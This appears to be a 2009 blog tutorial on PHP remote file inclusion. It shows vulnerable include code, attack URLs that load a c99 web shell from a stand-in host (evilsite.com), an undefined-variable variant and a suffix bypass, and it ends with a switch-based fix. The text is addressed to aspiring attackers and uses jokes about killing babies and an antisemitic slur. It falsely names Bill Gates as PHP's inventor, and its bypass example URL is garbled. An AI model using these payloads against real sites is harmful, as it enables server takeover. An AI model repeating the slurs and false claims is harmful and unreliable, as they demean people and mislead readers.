Friday, January 9, 2009

RFI Tutorial (remote file inclusion)

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.

He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.
Code:
http://www.yodad.com/index.php?page=blog.php
http://www.yodad.com/index.php?page=contact.php
http://www.yodad.com/index.php?page=gallery.php
Let's take a look at the code for index.php

Code:
//html for header
//html for menu
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']

This means when we go to
Code:
http://www.yodad.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"
Code:
http://www.yodad.com/index.php?page=http://www.google.com
You would see the google home page instead of your dads shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:
Code:
//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:

Code:
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.yodad.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:
Code:
http://www.yodad.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.

...

As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.
index.php:

Code:
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.

Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include :
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.


There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

Switching.

Code:
$page = $_GET['page'];
switch($page){
case "blog":
include("blog.php");
break;
case "contact":
include("contact.php");
break;
case "gallery":
include("gallery.php");
break;
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";
break;
}
?>

https://per1ova.startlogic.com/showthread.php?t=594

No comments:

LinkWithin

Related Posts with Thumbnails